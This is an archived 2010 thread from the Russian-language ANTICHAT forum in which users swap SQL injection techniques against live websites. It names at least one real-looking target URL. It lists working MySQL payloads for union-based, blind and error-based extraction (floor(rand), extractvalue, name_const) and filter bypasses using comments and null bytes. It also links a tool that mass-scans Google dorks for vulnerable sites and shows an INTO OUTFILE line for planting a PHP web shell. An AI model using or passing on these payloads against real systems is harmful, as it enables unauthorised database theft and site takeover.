ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
28.09.2010, 16:09
|
|
Познающий
Регистрация: 06.06.2008
Сообщений: 76
Провел на форуме:
117639
Репутация:
55
|
|
http://www.asiafuns.com/search_results.php?country=163+and+substring%28SEL ECT%20version%28%29,1,1%29=5+--+
select не фильтруется
|
|
|
28.09.2010, 17:22
|
|
Новичок
Регистрация: 09.11.2007
Сообщений: 24
Провел на форуме:
60954
Репутация:
3
|
|
Redwood, я понял. С шеллом не получилось. Но вот, что известно:
Инъекция в числовом параметре есть:
http://site.com/menu/show/121%20and%201=1/33/#main
Результат:
A Database Error Occurred
Error Number: 1054
Unknown column '20and' in 'where clause'
SELECT * FROM menu WHERE id=121%20and%201=1
Фильтруются пробелы, символы : ( , ) , /**/, +
Можно ли раскрутить скуль в таком случае?
|
|
|
|
28.09.2010, 19:46
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660
Репутация:
1148
|
|
подзапросы + join
|
|
|
|
28.09.2010, 19:51
|
|
Новичок
Регистрация: 09.11.2007
Сообщений: 24
Провел на форуме:
60954
Репутация:
3
|
|
Сообщение от Digger
Digger said:
пробуй POST'om
Это через программу? как бы я так понимаю я итак делаю post'om через браузер
Сообщение от Strilo4ka
Strilo4ka said:
подзапросы + join
подзапросы не помогают, потому что фильтруются даже скобочки в самой url
|
|
|
|
28.09.2010, 21:54
|
|
Guest
Сообщений: n/a
Провел на форуме:
15807
Репутация:
5
|
|
что делать если union и select в связке фильтруются
|
|
|
|
28.09.2010, 22:09
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846
Репутация:
56
|
|
Сообщение от LBC
LBC said:
что делать если union и select в связке фильтруются
Подзапросы, крутить как слепую, вывод в ошибке
Код:
Code:
sql.php?id=2+union+(select+1,2,table_name,4,5+from+information_schema.tables)
and etc
Код:
Code:
sql.php?id=2+and+(select+ascii(substring((select+table_name+from+information_schema.tables+limit+0,1),1,1))+from+information_schema.tables+limit+0,1)>66
and etc
Вывод через ошибку без использования Union
Для Mysql 4.1>=
Код:
Code:
sql.php?id=2+and+(select+1+from+(select+count(*),concat((select+table_name+from+information_schema.tables+limit+0,1),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)
Код:
Code:
sql.php?id=2+or+1+group+by+concat((select+table_name+from+information_schema.tables+limit+0,1),floor(rand(0)*2))+having+min(0)
Для Mysql 5.1>=
Код:
Code:
sql.php?id=2+and+extractvalue(1,concat(0x5c,((select+table_name+from+information_schema.tables+limit+0,1))))
Для Mysql 5.0.12 > 5.0.64
Код:
Code:
sql.php?id=1+or+(1,2)=(select*from(select+name_const((select+table_name+from+information_schema.tables+limit+0,1),1),name_const((select+table_name+from+information_schema.tables+limit+0,1),1))a)
Можно еще попробовать обойти так
Код:
Code:
sql.php?id=2+un/**/ion+se/**/lect+1,2,3,4,5
Код:
Code:
sql.php?id=2+un/*%00*/ion+se/*%00*/lect+1,2,3,4,5
Код:
Code:
sql.php?id=2/**/union/**/select/**/1,2,3,4,5
Код:
Code:
sql.php?id=2+union+%0A+select+1,2,3,4,5
Вариантов куча, всего не перечислишь, думаю этого должно хватить
|
|
|
|
28.09.2010, 23:57
|
|
Участник форума
Регистрация: 17.04.2010
Сообщений: 221
Провел на форуме:
344917
Репутация:
17
|
|
Кто знает софт(скрипт) который в гугл лезет по моему дорку, подставляет в URL ковычку и сайты где вышла ошибка передаёт мне?
|
|
|
|
29.09.2010, 07:03
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846
Репутация:
56
|
|
Сообщение от -PRIVAT-
-PRIVAT- said:
Кто знает софт(скрипт) который в гугл лезет по моему дорку, подставляет в URL ковычку и сайты где вышла ошибка передаёт мне?
http://zalil.ru/29741714
|
|
|
|
29.09.2010, 20:57
|
|
Новичок
Регистрация: 09.04.2009
Сообщений: 8
Провел на форуме:
71852
Репутация:
0
|
|
Нашел вот такую вещь
Код:
Code:
id=1+limit+1+into+outfile+'/path/to/shell.php'+fields+terminated+by+''+optionally+encl osed+by+""--+
Что-то я не пойму откуда берется шелл чтобы залить его в /path/to/ ? |
|
|
|
29.09.2010, 21:00
|
|
Новичок
Регистрация: 25.11.2009
Сообщений: 0
Провел на форуме:
68379
Репутация:
0
|
|
Сообщение от cipa21
cipa21 said:
Нашел вот такую вещь
Код:
Code:
id=1+limit+1+into+outfile+'/path/to/shell.php'+fields+terminated+by+''+optionally+encl osed+by+""--+
Что-то я не пойму откуда берется шелл чтобы залить его в /path/to/ ? Так вот оно: ""
Можешь на свой код заменить...
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
